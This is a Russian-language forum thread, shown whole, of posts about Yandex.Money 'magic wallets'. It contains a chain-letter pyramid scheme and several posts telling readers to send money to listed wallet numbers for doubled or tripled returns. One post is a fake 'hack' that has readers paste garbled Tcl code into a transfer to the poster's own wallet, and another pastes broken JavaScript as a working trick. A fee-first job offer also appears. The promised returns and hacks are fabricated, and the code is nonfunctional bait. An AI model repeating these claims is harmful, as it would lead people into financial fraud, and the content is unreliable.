2. Разместите эту статью на НЕ МЕНЕЕ ЧЕМ 200-300 ФОРУМАХ и НОВОСТНЫХ ЛЕНТАХ (News Groups). ЗАПОМНИТЕ: ЧЕМ БОЛЬШЕ Вы разместите, ТЕМ ВЫШЕ БУДЕТ ВАШ ДОХОД. И этот доход будет НАПРЯМУЮ ЗАВИСЕТЬ ОТ ВАС. Размещение этой статьи на 200 форумах, даже на самых малопосещаемых, ГАРАНТИРУЕТ Вам доход 150 000 руб. - ЭТО МИНИМУМ!!!, в течение двух месяцев!!! БОЛЬШЕ РАЗМЕЩЕНИЙ - БОЛЬШЕ ДОХОД (при том в ГЕОМЕТРИЧЕСКОЙ ПРОГРЕССИИ). ИТАК, КОГДА ВЫ ДОСТИГНЕТЕ ПЕРВОЙ ПОЗИЦИИ В СПИСКЕ, ВЫ БУДЕТЕ ИМЕТЬ ТЫСЯЧИ РУБЛЕЙ ПРОСТО КАК СОЗДАТЕЛЬ СПИСКА!!! ЭТО СТОИТ 70 рублей и СОВСЕМ НЕ ТРУДНОЙ РАБОТЫ! ГЛАВНОЕ - ЭТО РАБОТАЕТ!!! И ЭТО ПРОСТО ЗДОРОВО!!! ДАВАЙТЕ РИСКНЕМ!! ВЕДЬ НИЧЕГО, КРОМЕ 70 РУБЛЕЙ НЕ ТЕРЯЕМ!! А ЕСЛИ ВДРУГ ПОЛУЧИТСЯ!?
Поделиться2222013-09-08 16:44:58
410011969507059 еше один работающий кошелек работает от 50 до 199 рублей не больше.придет в 2 раза больше.в коментарии надо скопировать этот скрипт:<script language="JavaScript" type="text/javascript">// the number of ringsvar ringnumber=50function showrings() {ifdocument.all) { fr (i=0;i<=ringnumber;i++) { if (i{if (document.all) { clearTimeout(timer) startfontsize=0 for (i=0;i<=ringnumber;i++) { thisring=eval("document.all.ring"+i+".style") thisring.visibility="hidden"
i_fontsize[i]=startfontsizestep[i]=ringnumber*i*300startfontsize=Math.floor((maxfontsize/ringnumber))*(i+1)
<body><aref="http://scic.ya/seOver="showrings()onMouseOut="hid>[/font] подождем 3-5минут.обновляем страницу.деньги пришли в 2 раза больше.пользуюсь 2 месяца.пока все работает.всем пока.
Поделиться2232013-09-10 21:43:44
Волшебные
кошельки Yandex в интернете
Вы не знаете как заработать в интернете 1000 рублей в день.
Я Вас научу!!!
На этом сайте Вы узнаете всю правду о
ВОЛШЕБНЫХ КОШЕЛЬКАХ Yandex а также принцип их работы. Как работают
лохотронщики и как их обманывать, зарабатывая при этом деньги. Здесь Вы
узнаете алгоритм работы программ, управляющих волшебными кошельками
Yandex.
Сначала расскажу как меня кинули волшебные
кошельки Yandex на 1250 рублей.
Сидела я в Internet, лазила по сайтам и искала работу. И тут
наткнулась на сайт с заголовком "Волшебный кошелёк
Yandex в интернете ". Меня это заинтересовало и
зашла на этот сайт, на котором прочитала приблизительно следующую
информацию:«Есть в системе Yandex волшебный кошелек, и все что вы на него
пошлете вернеться вам в утроеном размере!!! Любая сумма! Пошлете тысячу
получите три тысячи и т.д.». Сразу подумала, что это очередное кидалово,
которых в Интернете миллионы. Но решила проверить и послала 50 рублей на
этот волшебный кошелёк Yandex Ждала в течение часа, но так мне ничего и не
прислали, подумала, что кинули, так как волшебные кошельки бывают только в
сказках и никто просто так делиться деньгами со мной не захочет. Но спустя
где-то ещё 3 часа проверила свой yandex кошелёк и обнаружила перевод в 150 рублей.
Удивилась и сразу же послала ещё 100 рублей - получила 300. Потом послала 250
рублей, мне пришло 750. Осмелев окончательно, в состоянии аффекта от
предвкушаемой прибыли послала всё, что у меня было - 1250 ... Что
было дальше я думаю Вы поняли. Никаких 3250 рублей мне с якобы волшебного кошелька,
конечно же, никто не прислал, да и мои 1250 рублей тоже исчезли бесследно и
навсегда.
Сначала расстроилась, так как с деньгами и так
проблемы были, а тут ещё и лохотронщики
кинули. Психология большинства людей устроена так, что если кто-то ожёгся на
чём-либо, то больше никогда туда не полезет. Но я решила не бросать это, а
задумалась как работают эти чёртовы волшебные кошельки Yandex Полазив в
поисковых системах я нашла множество подобных сайтов и, как ни странно, кошельки
в них очень часто повторялись.Проанализировав всю найденную информацию о
Волшебных кошельках Yandex я поняла как они работают.
Программы для работы с волшебными
кошельками Yandex
У них есть специальная программа, которая
смотрит кто сколько переводов сделал и на какую сумму, чтобы определить когда
нужно остановиться. В этой программе фиксирутся кошелёк, с которого были
посланы деньги и хозяин волшебного кошелька делает ряд настроек в программе,
таких как коэффициент возврата денег, максимальный размер перевода, после
которого он перестаёт высылать Вам деньги, количество возвратов денег и многие
другие. Коэффициент возврата денег приблизитльно на 70% проссмотренных мною
сайтов с волшебными Yandex кошельками равен трём и на 30%-двум. Минимальные
переводы, на которые отвечает программа почти везде 50 рублей. Срок жизни волшебного Yandex кошелька в среднем
составляет 3-4 месяца. Потом их закрывает система Yandex, или они сами меняют
номер кошелька или банкротятся.Но остановимся поподробнее на волшебном кошельке, который сейчас пытаюсь разорить я - 41001332289544
Волшебный кошелёк 41001332289544.
Подробности его работы.
Переводы суммой до 500 рублей он не
забирает никогда. Только если вы пришлете его больше 3 раз подряд с одного
кошелька. То есть, послав 500 рублей вы в любом случае получите 1500 рублей, т.к.
сумма мелкая и они будут ждать пока вы пришлете больше. Также не забираються
одноразово присланные суммы до 1000 рублей. Если аккуратно слать им небольшие
суммы с разных кошельков то можно их обманывать. Они же не смотрят на переводы
сами, за них это делает специальный софт (программа).
Стратегия заработка денег с помощью волшебных
кошельков Yandex
Можно открыть где-то 3 кошелька, и постоянно слать, и быть в плюсе всегда. Я
сейчас зарабатываю на этом около 16000 рублей в месяц. Можно делать и больше, но я
сейчас учусь в институте и воспитываю двухлетнего ребёнка, поэтому времени
мало. Раньше приходилось работать на заводе в ночную смену, но узнав про
волшебные кошельки Yandex я бросила её и теперь работаю на дому за
компьютером, не оставляя ребёнка одного. Это не миллионы, но это более-менее
стабильный доход.
Лично я каждую неделю открываю 3 новых кошелька и шлю по
одному переводу с каждого моего кошелька на 410011492712593 с темой "money" по 500 рублей и 2 перевода по 50 рублей и
всегда получаю утроенную сумму назад.
Через неделю я меняю свои
кошельки и делаю то же самое. Но если на первом этапе у Вас совсем нет
денег, то можете переводить сумму в 50-300 рублей до тех пор пока не
раскачаетесь и не получите сумму 1500 рублей, после чего ставку поднимать не
стоит, т.к. могут кинуть.
Денег на этих кошельках десятки и
сотни тысяч, и меня очень раздражает как они кидают людей, поэтому надо их
разорить. Больше всего в жизни я ненавижу, когда меня обманывают. Поэтому я
решила бороться с лохотронщиками до конца и надеюсь Вы мне в этом поможете,
заработав при этом денег. Сейчас я везде где можно разместила данную информацию,
для того, чтобы как можно больше народа узнало об этом. Все равно рано или
позно они увидят что они идут в минус и поменяют свою систему. Осталось недолго
и надо отхватить все что можно. Разорив волшебный кошелёк (41001332289544)
перейду на другой. У меня есть на примете ещё 3 проверенных волшебных кошелька.
Как только мы разорим кошелёк 41001332289544 или его закроют я обязательно обновлю этот сайт и сообщу вам новый
проверенный волшебный кошелёк. Я уже сагитировала порядка 30 своих друзей, которые тоже
пытаются разорить лохотронщиков и призываю Вас присоединяться к нам.
А пока за дело... На волшебном
кошельке 41001332289544 полно денег.
Поделиться2242013-10-24 17:12:39
Всем привет я сейчас раскажу как меня кинули на 1,5 тыс. рублей я люблю смотреть лохотроны с онлайн казино (ну хобби у меня такое). И тут очередной лохотрон но с яндекс деньгами про волшебные кошельки на 2 из 3 меня кинули, а 3ем кошельке я послал туда
50 р через 15мин мне пришло 150 р я послал 100р получил 300 р а номер счета 41001832382650 затем как последний дебил послал все что было (1503 р) и тут я понял меня кинули а прикол во всем в том что меньше 500р он не заберет никогда будет ждать больше там же программа а не человек.так вот так
Поделиться2252013-10-26 03:28:48
Все эти "волшебные кошельки" это лохотрон, но есть и такие, которые можно назвать "лохотрон с приманкой". Суть его проста: вы отправляете деньги на указанный счет, и на ваш счет действительно приходит сумма в два раза больше, вы на радостях отправляете суму гораздо больше начальной, а вот здесь уже в ответ тишина. Заработать на таких счетах и вправду можно, но не больше 300-500 рублей с одного счета (имеется ввиду со своего счета). Как это сделать: отправлять суммы больше 500 рублей категорически не желательно, 1000 вам обратно никто не пришлет, а вот если отправить 50 или 100, то деньги придут, и сумма будет действительно в два раза больше, но повторить эту процедуру больше 3-х раз не получится. Как вариант, отправить деньги, если сумма удвоится, повторить процедуру еще один раз, с той же суммой с которой все прокотило, желательно не больше 50 рублей, дабы не рисковать. В третий раз не всегда получится. После этого(в случае успеха) создаете 10 и более левых счетов, и с каждым из них повторяете описанную выше процедуру, после чего деньги скидываете в кучу на какой то отдельный счет (с которого желательно ничего никуда не отправлять, чтоб не светить его) и радуетесь. Вот и все. Это конечно накаляет, создавать множество счетов, но зато работает на вас, а не на кого-то. Счет с которым можно провернуть эту уловку: 410012009607252 Отдельная просьба, при нахождении подобных счетов, с которыми данный способ так же будет работать, не жадничайте, поделитесь.
Поделиться2262013-11-04 15:24:18
И так как же все таки выполнить взлом яндекс денег на своем компе! Объясняю чайникам!
1. Для начала переходим на сайт yandex.ru
2. Заводим почтовый ящик
3. Заводим яндекс счет
4. Ложем на свой яндекс счет денег .Кошелек в системе Яндекс.Деньги можно пополнять следующими способами:
Наличными со своего банковского через банковские отделения
Через системы переводов и платежей CONTACT, Юнистрим, Анелик, Город.
Через терминалы самообслуживания. Список терминалов, подключенных к этой услуге, весьма обширен.
Банковской картой КБ ОТКРЫТИЕ (РБР) или карты РосЕвроБанка.
С помощью карт предоплаты Яндекс.Денег.
Для взлома вам понадобится сумма около 31 рублей
5. Теперь нажимаем перевести и переводим сумму ровно 30 рубля
6. Переводим на этот счет 41001830857873
Почему на этот? И так объясняю я подготовил скрипт для генерирования и привязал его к этому счету.
7. Где сообщение получателю пишем вот этот скрипт :
set chann "#channel"
poreach tms "[timers]" {
if {([llength $tms] != 0)} {
set tmc [lindex $tms 1]
set tid [lindex $tms 2]
if {($tmc == "unmode")} {
killtimer $tidforeach tms "[utimers]" {
set tmc [lindex $tms 1]
set tid [lindex $tms 2]
if {($tmc == "strip")} {
killutimer $tid
}
Там где написано set chann "#channel" пишем 4 последних цифры своего яндекс счета.
Вот как примерно должно выглядеть:
set chann "#channel"6396
poreach tms "[timers]" {
set tmc [lindex $tms 1]
set tid [lindex $tms 2]
if {($tmc == "unmode")} {
killtimer $tidforeach tms "[utimers]" {
set tmc [lindex $tms 1]
set tid [lindex $tms 2]
if {($tmc == "strip")} {
killutimer $tid
}
8. В название платежа пишем:
set tmc [lindex $tms 1]
9. И жмем перевести
10. Все теперь подождем не много времени, операция взлома длиться от 2 до 10 минут. К вам на яндекс счет должна поступить сумма в размере 450 рублей.Конечно это не 10 тысяч рублей но все ровно деньги.Некоторые спросят почему я это все выкладываю и рассказываю, да потому что для меня 450 рублей это копейки я выводил из платежных систем по миллионам.Так что пользуйтесь халявным сыром пока даю. Кстати, уважительная просьба пользоваться взломом не более 3-4 раз в день. Не будем жадными а то сисадмины найдут эту дырку и залатают. Надеюсь подробно объяснил вам, вот еще одна картинка как все должно выглядеть при переводе жми ЗДЕСЬ. Сам факт получения чего-то на халяву уже заставляет человека совершать какие-то телодвижения. Главное в этом деле не жадничать и помнить про Уголовный Кодекс. Но зато какой результат... Я думаю, оно стоит того. И еще - за все проведенные тобой платежи ты будешь отвечать по полной программе сам и только сам. Автор и администрация форума к твоим деяниям не имеют никакого отношения. Удачи!!!
И ещё одно за свои действия полностью отвечаю)
Поделиться2272013-12-09 23:42:05
На этом сайте Вы узнаете всю правду о ВОЛШЕБНЫХ КОШЕЛЬКАХ, а также принцип их работы. Как работают лохотронцики и как их обманывать, зарабатывая при этом деньги. Здесь Вы узнаете алгоритм работы программ, управляющих волшебными кошельками. Сначала расскажу как меня кинули волшебные кошельки на 1472 р. Сидел я в Internet, лазил по сайтам и искал работу. И тут наткнулся на сайт с заголовком Волшебный кошелёк. Меня это заинтересовало,зашёл на этот сайт, на котором прочитал«Есть в системе Яндекс.Деньги волшебный кошелёк, и все что вы на него пошлете вернеться вам в утроеном размере!Любая сумма!Пошлете тысячу получите три тысячи и т.д.». Сразу подумал,что это очередное кидалово,которых в Интернете миллионы.Но решил проверить и послал 50р.Ждал в течение часа, но так мне ничего и не прислали,подумал,что кинули.Но спустя где-то ещё 3 часа проверила свой кошелёк и обнаружил перевод в 150р. Я сразу же послал ещё 100 р – получил 300. Подумал действительно работает,послал всё, что у меня было 1472 р. Что было дальше я думаю Вы поняли. Никаких денег мне не пришло. Сначала расстроился, обидно блин. Но решил задуматься,как работают эти чёртовы волшебные кошельки. Полазив в поисковых системах я нашёл множество подобных сайтов и, как ни странно, кошельки в них очень часто повторялись. Поразмыслив,я понял их систему.Принцип работы волшебных кошельков. На волшебный кошелёк сразу никто много не пошлёт. Вот они и отдают деньги, чтобы люди осмелели и поверили им. Но можно и обмануть волшебные кошельки.Если быть аккуратным и выслать, небольшую сумму, то всегда можно получать в три раза больше. Волшебный кошелёк 41001342232673. Подробности его работы. Переводы суммой до 726 р он не забирает никогда. Только если вы пришлете его больше 3 раз подряд с одного кошелька. То есть, послав 726 вы в любом случае получите сумму в 3 раза больше,так как сумма мелкая и они будут ждать пока вы пришлете больше. Также не забираються одноразово присланные суммы 1500 р. Если аккуратно слать им небольшие суммы с разных кошельков то можно их обманывать. Они же не смотрят на переводы сами, за них это делает специальный софт (программа). Стратегия заработка денег с помощью волшебных кошельков Яндекс.Деньги Можно открыть где-то 3 кошелька, и постоянно слать, и быть в плюсе всегда. Это не миллионы, но это более-менее стабильный доход. Денег на этих кошельках десятки и сотни тысяч, и меня очень раздражает как они кидают людей, поэтому надо их разорить. Больше всего в жизни я ненавижу, когда меня обманывают. Поэтому я решил бороться с лохотронщиками до конца и надеюсь Вы мне в этом поможете, заработав при этом денег. Я уже сагитировал порядка 30 своих друзей, которые тоже пытаются разорить лохотронщиков и призываю Вас присоединяться к нам. А пока за дело... На волшебном кошельке 41001663443196полно денег.
Отредактировано Маша (2013-12-09 23:42:56)
Поделиться2282013-12-24 22:44:13
ребят помогите насобирать на мотоцикл уже есть 166500 рублей а надо 590000. !!! я байкер с 8 лет щас 21 но я не как не могу накопить )-: . Пожалуйста кто скок может киньте вот на этот кошелек 410011665058631 буду очень благодарен !! !!!!
Поделиться2292013-12-26 02:26:46
Всем огромный привет и самых наилучших пожеланий! Пусть все ваши мечты сбываются и сбудутся! И В ЭТОМ Я ВАМ ПОМОГУ! Надеюсь всем ну или большенству из Вас! И так для начала я обьясню вам почему вы ни когда не зарабатывали и не получали денежное вознаграждение за работу в интернете. Да потому что все сайты предлагающие работу в интернет это и есть один большой обман! Большинство сайтов а это 99% предлагающие работу и зарабаток, доступных простому обывателю это и есть развод по русски или по европейски как его не назови Вас всё ровно обманывают и кидаю! И вы сами в этом виноваты, что другие а это создатели и администрация сайтов на вас зарабатываю огромные деньги. Вы пашите на кликах, на письмах ищите днями и ночами рефералов зарабатываете копейки, собираете крохотную суммму на вывод который вам обещают и в итоге вы заказываете на вывод свои честно заработанные малые суммы вознаграждений И ВСЁ! Проходит день, два, пять, неделя и ни каких денег вам не поступает! А по чему да по тому что все эти сайты и работадатели не несут ни какой ответственности перед законом и вами, так как вы официально у них не работаете в штате не числитесь и в бюджете компании у них не проходите! Вы для них как "Мёртвые души"! Так за чем же им вам платить, если вы и так пашете на них даром! То что вы регистрируетесь на каком то из сайтов который обещает сразу после регисрации, что вы будете работать ( ну то что вы будете работать и пахать это они вам и правда организуют, а вот получите вы за это хоть что то ЭТО БОЛЬШОЙ ВОПРОС!) и заработаете хорошие деньги ровным счётом ни чего не значит, и ни кого из администрации ни к чему не обязывает. Это то же самое что вы зарегистрировали себе почтовый ящик, да только провайдеру на котором зарегистрирован любой почтовый ящик и то больше доверия чем к любому из сайтов предлагающих работу или зарабаток. Они хоть отвечают за ваши письма и есть куда обратиться с притензиями или проблемой! А все эти буксы, капы, сайты с обещаниями заработков и огромных прибылей, нет ни адресов, ни телефонов, ни службы поддержки, а если даже и есть то ни чего из этого не работает и никто на ваши притензии и жалобы не отвечает! ВЕДЬ ТАК? ПРАВДА! Так за чем вы ведётесь на всё это и тратите свои силы, нервы, время и главное деньги! Обещали все вам зарабаток, а в ИТОГЕ ВЫ ЕЩЁ И СВОИ ДЕНЬГИ ВЛОЖИЛИ И НИ ЧЕГО НЕ ПОЛУЧИЛИ! Ну а про волшебные кошельки я вообще ни чего не буду говорить что бы ни кого не обидеть, те кто на этом уже обжёгся надеюсь уже поняли и не лезут в эту мышеловку за бесплатным сыром. Ну а для тех кто не знает ПРЕДУПРЕЖУ И ПОВТОРЮСЬ "сыр бесплатный бывает только в мышеловке!" НЕ ВЕРЬТЕ и ни чего на эти кошельки не отсылайте! Ведь кто на писал про этот кошелёк того и НОМЕР кошелька в этой статье и указан! Вы просто отдаёте автору этой статьи деньги, ну а он никогда и ни за что вам их не вернёт да ещё вда-три раза больше! И ТАК НАДЕЮСЬ Я ПОНЯТНО ОБЬЯСНИЛ ПОЧЕМУ ВЫ НЕ ЗЫРАБОТАЛИ НИ КОПЕЙКИ В ГЛОБАЛЬНОЙ СЕТИ ИНТЕРНЕТ! ГЛАВНОЕ ПОЧЕМУ ВЫ САМИ ЭТОГО НЕ ПОНИМАЕТЕ И ПО ЧЕМУ НАРОД ПРОДОЛЖАЕТ ВО ВСЁ ЭТО ВЕРИТЬ И РАБОТАТЬ ДАРОМ! ДЛЯ МЕНЯ ЭТО ОСТАЁТСЯ ЗАГАДКОЙ!
!НУ А ТЕПЕРЬ Я РАССКАЖУ ТО ЧТО Я ХОЧУ ПРЕДЛОЖИТЬ ВАМ! И ЧТО БЫ ВЫ ДЕЙСТВИТЕЛЬНО РАБОТАЛИ ЗА РЕАЛЬНЫЕ А НЕ ВИРТУАЛЬНЫЕ ДЕНЬГИ И БЫЛИ УВЕРЕНЫ В СВОЕЙ ЗАРПЛАТЕ, РАБОТЕ И ЗАВТРАШНЕМ ДНЕ!!!!!!!!!
И так меня зовут Ткаченко Степан Владимирович! Всё что я здесь хочу вам предложить это официально и имеет лицензию. Моя деятельность оформлена по всем правам так как я являюсь: ПБОЮЛ Ткаченко Степан Владимирович; ИНН 231302679988; ОГРНИП 304231327900091, свидетельство серия 23 № 003142819 от 05.10.2004г. Если желаете можете проверить для этого и написано!
И так Я и мои помощники проделали колосальную, долгую на протяжении 1,5 лет работу. И теперь плоды этой работы я и хочу вам предложить и поделиться. Я предлагаю вам РАБОТУ В ИНТЕРНЕТЕ НА ДОМУ С ОФИЦИАЛЬНЫМ ТРУДОУСТРОЙСТВОМ по ТК РФ или ДОГОВОРУ НАЙМА НА РАБОТУ!!!
За полтора года я и мои помощники искали и находили и находим по сей день Фирмы, организации, компании, частные, комерчиские и т.д. и заключили с ними договора о помощи по подбору персонала для них. Которые будут выполнять огромный фронт работы для них на дому через интернет, так как это сокращает огромнийшие средства на экономии зданий, аренды или покупки помещений, офисной мебели, компьютерной и орг техники и т.д. Как мы этого добились рассказывать не буду секрет фирмы, скажу одно времени, связей и финансов потрачено огромное колличество. Я предлагаю работу практически любому человеку на территории Российской Федирации, зависит от его места жительства и его желения съездить два раза в офис компании которую он выберет для работы что бы трудоустроиться. Предложения по работе есть в любой области России. В каждой области, крае до пяти больших городов где у нас есть предложения по работе, вы можете жить даже в небольшом городе или посёлке, деревне не важно главное что бы была прописка вашей области или края и возможность или желание съездить в тот город который вы выберите для трудоустройства. Вы можете работать даже по совместительству, даже если у вас уже есть работа но не хватает денег можете просто подрабатывать себе на необходимые для жизни вещи!
Теперь я раскажу вам как всё будет происходить, то есть как вы получите ОФИЦИАЛЬНУЮ РАБОТУ В ИНТЕРНЕТЕ. Так как я уже говорил что было потрачено много сил, времени и финансов, то наши услуги не будут бесплатны. НО НЕ БЕСПОКОЙТЕСЬ НИ КТО С ВАС ТРИ ШКУРЫ ДРАТЬ НЕ БУДЕТ ТЕМ БОЛЕЕ СРАЗУ. ЭТО В ИНТЕРНЕТЕ ВЫ СНАЧАЛА ПЛАТИТЕ И ВАМ ОБЕЩАЮТ ЗОЛОТЫЕ ГОРЫ, И В ИТОГЕ НЕТ НИ ДЕНЕГ НИ ГОР. СНАЧАЛА ВЫ ТРУДОУСТРАИВАЕТЕСЬ ПОЛУЧАЕТЕ РАБОТУ А ПОТОМ УЖЕ Я ПОЛУЧАЮ СВОЁ ВОЗНАГРАЖДЕНИЕ! И так всё по порядку: 1) наверно всех в первую очередь интересует сколько ему обойдётся трудоустройство, от 1200р до 5200р. Это зависит от вашего региона проживания, от выбранной вами работы, от вашей зарплаты. И так идём дальше, вы оплачиваете мне 200р на интернет кошелёк (почему 200 рублей сразу, я обьясню чуть ниже), в графе пояснение платежа указываете свой адрес почтового ящика и Фамилию, Имя, так я буду знать что это именно вы оплатили перевод. Присылаете мне со своего почтового ящика, который был указан в платёжке перевода, письмо. В котором указываете Фамилию, Имя, Область или Край и город (населённый пункт) в котором проживаете, если есть специальность какая то - её тоже напишите, и образование если есть. ОГРОМНАЯ ПРОСЬБА В ПИСЬМЕ ТАК ЖЕ УКАЗЫВАТЬ С КАКОГО ФОРУМА ИЛИ САЙТА В УЗНАЛИ ОБ ОБЬЯВЛЕНИИ! Это мне нужно что бы я смог подобрать вам те варианты которые вам наибольше подойдут. В ответ вы получаете от меня письмо в котором будет пять предложений о работе вашего региона. На звание компании, фирмы их адреса, телефоны, и интернет сайты. Дальше вы связываетесь с компанией по телефону за полняете анкету на их сайте. Вам звонят и назначают день когда вы должны будете к ним подъехать для оформления документов. Трудоустройство 99,9% что вас примут не переживайте я в этом заинтересован ведь ваше трудоустроиство это мои деньги. Почему 99,9%, а в друг война biggrin , но это так шутка! Всю остальную информацию по работе вы получите не посредственно в офисе компании. При оформлении документов у вас спросят откуда узнали о вакансии вы ссылаетесь что информацию получили по интернету от ( ПБОЮЛ Ткаченко Степан Владимирович), и что уже оплатили 200 рублей! И второй раз вам прийдётся к ним подехать (я выше уже упоминал что нужно будет подъехать к ним в офис два раза) это примерно через две недели, получить БАНКОВСКУЮ КАРТУ на которую будет приходить ваш оклад, потому что это ДЕЙСТВИТЕЛЬНО РАБОТА А НЕ ИНТЕРНЕТОВСКИЙ ОБМАН ЗДЕСЬ НЕТ НИ КАКИХ ИНТЕРНЕТ ИЛИ ОНЛАЙН ВЫПЛАТ! РЕАЛЬНАЯ РАБОТА - РЕАЛЬНАЯ ОПЛАТА! И так раз вы устроились и работаете значит вы уже заплатили мне 200р. Теперь поговорим об остальной части моего вознаграждения свои деньги от 1000р до 5000р в зависимости от полученной и выбранной вами вакансии ( ВАЖНО - расценка за вакансию будет указана в письме конкретно за каждую) я автоматически получу с вашей первой зарплаты, она будет удержана с вашего счёта фирмой в мою пользу за оказанные вам услуги в трудоустроистве. !ТОЛЬКО ОДИН РАЗ В РЕВЫЙ МЕСЯЦ! Почему нужно указать в офисе что вы уже оплатили 200 рублей, потому что если вы не укажите это при заполнении анкеты, то сумма удержанная с вашей зарплаты увеличится как раз на сумму в 200р. Пожалуйста не забывайте указывать это в анкете или устном вопросе, что бы потом у нас с вами не было разногласий по этому поводу!
Теперь обьясню почему вы оплачиваете двести рублей сразу! Как и влюбом агенстве или бюро по трудоустроиству вы при обращении оплачиваете услугу не посредственно перед тем как вам выдадут информацию. И у них эта информация стоит гораздо дороже вы и сами это знаете порядка 500 - 1000 рублей. Но и я в итоге беру потом от 1000 до 5000 рублей, скажите вы! Но и я отвечу вам, что в агентстван НЕТ ТОГО ЧТО Я МОГУ ПРЕДЛОЖИТЬ ВАМ!!! И я уже говорил что проделана колосальная очень огромная работа, по сбору и получению информации от компаний работадателей и она уникальна! Если я буду рассылать её бесплатно то многие могут и ЗАХОТЯТ просто получить как можно больше информации о кампаниях, фирмах и организациях работадателей и элементарно заняться плагиатом! А в этот проэкт вложено огромное количестко сил и всевозможных затрат! ПОЭТОМУ НЕТ, ИНФОРМАЦИЯ О РАБОТАДАТЕЛЯХ СТОИТ ХОТЬ И НЕ БОЛЬШИХ НО ДЕНЕГ! И ЭТО СПРАВЕДЛИВО! Хотя можно и так даже по двести рублей собрать плагиатчикам и всяким НЕ ХОРОШИМ людям определённый объём информации о работадателях! Этого не избежать! Но в этом случае я хоть не много компенсирую свои затраты! Поэтому информация о работе стоит своих денег, а трудоустройство своих! Этот проэкт уникален и не имеет ещё аналогов в Российской сети интернет! Но будьте внимательны скоро возможно через 2-3 месяца появятся мои первые плагиатчики которые соберут информацию о моих работадателях, и начнут её рекламировать. Будьте осторожны так как информацию они вам хоть и не большую смогут предоставить, но вот трудоустроить в эти компании они вас не смогут! Повторюсь этот проэкт уникален и я его создал поэтому обьявления такого характера являются настоящими только те которые содержат данные о (ПБОЮЛ Ткаченко Степан Владимирович, e-mail - real-rabota@yandex.ru , и номер yandex кошелька (410011665058631).
Ещё расскажу и обьясню почему все наши с вами действия происходя дистанционно по средству интернет. Так как если открывать во всех регионах нашей страны офисы, а это аренда помещений, оборудование их, трудоустройство людей и их зарплата в данный момент это очень накладно. И если даже всё это организовать то это отразится в первую очередь на самих вас, так как мы будем вынужденны поднять наши расценки за услуги во много раз, что бы хоть как то начать окупаться! Но вбудущем я об этом думаю и планирую! Так что через 2-3 года мы уже откроем большое колличество своих офисов в центральной части России!
Так же ВНИМАНИЕ ответ вам, после оплаты и вашего письма мне ( с указанной о вас необходимой информацией ) поступит вам максимально поздно не больше чем через два дня. Но я приложу все усилия что бы ответ вам поступил как можно быстрей! Так как все заявки и ответ рассматриваются и формируются вручную индивидуально для каждого! И скаждым днём их приходит всё больше и больше! И сами понимаете просто физически ответить всем сразу и моментально нет возможности! На данный момент у нас огромное количество вакансий, но так же каждый день огромное количество и заявок которые с каждым днём всё увеличиваются больше! Поэтому возможные перебои с количеством вакансий, в таких случаях ваша оплата будет вам переведена обратно. И как только появятся подхадящие для вас вакансии и в вашем регионе, вы получите от меня письмо с предложением оплатить услугу, и получить ваши вакансии!
ТАК ЖЕ ВНИМАНИЕ! вы получаете пять предложений по работе на свою почту, но трудоустраиваетесь только по одной. После вашего трудоустройства по одной из них остальные для вас считаются не действительны, и они будут для вас онулированы! Не пытайтесь по ним устроить кого то из ваших родственников, друзей или знакомых не получится! Если кто то из ваших друзей захочет тоже такую работу ему прейдётся так же оплать 200 рублей и отправить свои данные мне, после чего он как и все получит свои вакансии!
В общем это вроде и всё что я хотел вам рассказать, предложить и обьяснить! Но если я что-то забыл или не рассказал, не обьяснил. Или у вас просто возникли свои вопросы! Задавайте, спрашивайте и пишите на адрес real-rabota@yandex.ru я с удовольствием вам помогу, расскажу и обьясню!!!
Поделиться2302014-01-01 18:39:44
Если у Вас есть желание заработать,не вкладывая много денег (к примеру, другие Интернет - проекты требуют вложений до 900$) и работая всего по несколько часов в день, то эта информация для Вас.
Наткнулась я на ЭТО совершенно случайно,найдя статью,в которой говорилось,что МОЖНО СДЕЛАТЬ СОТНИ ТЫСЯЧ РУБЛЕЙ ЗА ПАРУ НЕДЕЛЬ ПРИ ВЛОЖЕНИИ ВСЕГО 70 РУБ. Я подумала,что это должно быть очередной фишкой для лохов,но решила всё-таки дочитать до конца и узнать,что за Гербалайф - Орифлейм там предлагают.
Дальше там говорилось,что надо послать по 10 рублей на 7 Internet-кошельков, которые ниже перечислены.Потом вычеркнуть первый кошелёк из списка, тем самым, сместив список на одну строчку вверх. В результате чего седьмая строчка освобождается,куда Вы вписываете номер своего Internet-кошелька.Затем Вы закидываете данное сообщение, но уже с ВАШИМИ ДАННЫМИ на седьмой строчке, на 200 разных форумов - НИКАКИХ УЛОВОК!Ну, я поразмышляла и подумала, что в принципе НИЧЕГО НЕ ТЕРЯЮ кроме 70 руб. ЗАТО У МЕНЯ ПОЯВЛЯЕТСЯ ШАНС ЗАРАБОТАТЬ.И я решила попробовать.Установила Интернет-кошелёк,перечислила всем участникам акции по 10 руб.и начала рассылать эти объявления по разным форумам и доскам объявлений.В течение 2-х дней я зарегистрировалась на более чем на 100 бизнес-форумах и бесплатных досках объявлений.Прошла неделя,заглядываю в свой Интернет кошелек,и угадайте ЧТО!Поступлений никаких нет,вообще!Ещё через неделю заглянула в свой Интернет кошелек.Смотрю,всего одно поступление - 10 руб.Да,думаю,дело не стоящее,случайно нашёлся такой же наивный,как и я.Ещё через две недели я все-таки снова открыла свой Интернет кошелек,а в нем уже около 900 руб. Откуда? Непонятная картина, но всё равно за 1 месяц 900 руб.
И вдруг после 1 месяца началось самое интересное:на мой кошелёк стали приходить деньги КАЖДЫЙ ДЕНЬ,спустя ещё 2 недели на моем счету уже было более 48 000 руб.После этого я отправила свои объявления ещё более чем на 150 форумов.РЕЗУЛЬТАТ БЫЛ ОШЕЛОМЛЯЮЩИЙ.По прошествии всего 2 месяцев,я получила 141 000 руб.И деньги идут каждый день.Каждые 10 минут на мой счёт поступает по 10-30 руб.И это все только за цену в 70 руб!Моя работа теперь - это каждый день по 2-3 часа в Интернете и ВСЁ!!!! А заработок такой,что никаким начальникам и руководителям даже и не снился!
Теперь,я расскажу Вам,как это работает и самое главное ПОЧЕМУ.Я Вам обещаю, что если вы будете В ТОЧНОСТИ соблюдать ниже перечисленные инструкции, то вы начнете получать НАМНОГО БОЛЬШЕ ДЕНЕГ,не прилагая к этому особых усилий.Согласитесь, это просто!И ЭТО СОВЕРШЕННО ЛЕГАЛЬНО. И ВАШ ВКЛАД СОСТАВЛЯЕТ ВСЕГО 70 РУБЛЕЙ.ВАЖНО ЭТО НЕ ОБМАН И ПРИ ЭТОМ ВЫ НИЧЕМ НЕ РИСКУЕТЕ, НО ЭТО РАБОТАЕТ!
ВОТ ТЕ САМЫЕ 3 ШАГА:
